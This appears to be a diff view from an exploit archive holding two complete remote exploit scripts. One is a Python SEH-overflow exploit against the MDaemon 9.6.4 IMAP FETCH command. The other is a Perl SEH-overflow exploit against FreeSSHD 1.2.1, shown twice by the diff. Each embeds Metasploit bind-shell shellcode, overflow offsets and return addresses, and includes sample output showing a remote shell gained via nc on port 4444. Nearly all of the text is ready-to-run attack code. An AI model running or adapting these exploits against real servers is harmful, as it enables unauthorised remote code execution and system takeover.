print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
# milw0rm.com [2008-03-13]
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
print "[*********************************************************************]"
print "[* *]"
print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]"
print "[* DISCOVERED AND CODED *]"
print "[* by *]"
print "[* MATTEO MEMELLI *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
"\xff\xd0"
)
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inbox\r\n")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
s.send('0003 APPEND Inbox {1}\r\n')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCE\r\n')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
s.close()
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
# milw0rm.com [2008-03-13]

286
platforms/windows/remote/5751.pl
View file

@ -1,143 +1,143 @@
#!/usr/bin/perl
###############################################################################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
###############################################################################
# #
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# [*] Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 10.150.0.228 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
###############################################################################
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
exit;
}
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48".
"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x57\x43\x37".
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x43\x35\x43\x54".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x4a\x36\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x52".
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x41\x35\x4c\x46".
"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;
}
else
{
print "[-] TARGET ERROR!\n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print "[*] Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;
# milw0rm.com [2008-06-06]
#!/usr/bin/perl
###############################################################################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
###############################################################################
# #
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# [*] Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 10.150.0.228 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
###############################################################################
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
exit;
}
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48".
"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x57\x43\x37".
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x43\x35\x43\x54".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x4a\x36\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x52".
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x41\x35\x4c\x46".
"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;
}
else
{
print "[-] TARGET ERROR!\n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print "[*] Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;
# milw0rm.com [2008-06-06]